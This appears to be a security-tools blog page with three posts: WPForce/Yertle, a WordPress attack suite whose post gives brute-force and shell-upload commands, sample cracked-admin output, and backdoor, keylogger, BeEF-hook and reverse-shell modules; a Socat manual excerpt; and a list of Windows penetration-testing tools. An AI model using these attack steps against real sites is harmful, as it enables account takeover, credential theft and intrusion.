This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Netcat. Show all posts
Showing posts with label Netcat. Show all posts

WPForce - Wordpress Attack Suite

April 01, 2017  , , , , , , , , , ,  


WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules.


Features:
  • Brute Force via API, not login form bypassing some forms of protection
  • Can automatically upload an interactive shell
  • Can be used to spawn a full featured reverse shell
  • Dumps WordPress password hashes
  • Can backdoor authentication fuction for plaintext password collection
  • Inject BeEF hook into all pages
  • Pivot to meterpreter if needed

Install:
Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

Usage:
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}

 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell

Yertle currently contains these modules:
Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page


Read More

Socat - Multipurpose relay (SOcket CAT)

February 03, 2015  , , , , , ,  

Socat is a utility similar to the venerable Netcat that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more infos.

Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

The life cycle of a socat instance typically consists of four phases.

In the init phase, the command line options are parsed and logging is initialized.

During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side andcan be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.

OPTIONS

Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so called address options that are used as parts of address specifications.

-V
Print version and available feature information to stdout, and exit.
-h | -?
Print a help text to stdout describing command line options and available address types, and exit.
-hh | -??
Like -h, plus a list of the short names of all available address options. Some options are platform dependend, so this output is helpful for checking the particular implementation.
-hhh | -???
Like -hh, plus a list of all available address option names.
-d
Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
-d -d
Prints fatal, error, warning, and notice messages.
-d -d -d
Prints fatal, error, warning, notice, and info messages.
-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.
-D
Logs information about file descriptors before starting the transfer phase.
-ly[<facility>]
Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
-ls
Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
-lp<progname>
Overrides the program name printed in error messages and used for constructing environment variable names.
-lu
Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
-lh
Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
-v
Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
-x
Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v.
-b<size>
Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
-s
By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.
-t<timeout>
When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
-T<timeout>
Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
-u
Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing (example).
-U
Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
-g
During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., appliance of a socket option to a serial device.
-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-4
Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.
-6
Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version. 


Read More

36 Windows Tools For Penetration Testing

January 08, 2013  , , , , , , , , , , , ,  



Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.

The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).

Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Remote access software for desktop and mobile platforms.

SNMP tool that allows you to collect information about SNMP devices.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.

PuTTY is an SSH and telnet client for the Windows platform.

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.

Recovering Windows Password Cache Entries.

Identify unknown open ports and their associated applications.

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.

ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.

SQLdict is a dictionary attack tool for SQL Server.

PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.

GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.

DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.

BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).

Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).

Brute-force tool for Windows Management Instrumentation (WMI).

Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.

The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.

RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.

LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.

SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.

The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.

Extract password hashes from local user accounts.

The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.

Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.

DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.

X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.

Windows password cracker.

Ophcrack is a free Windows password cracker based on rainbow tables.

SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

[Source]

Read More
Subscribe to: Posts (Atom)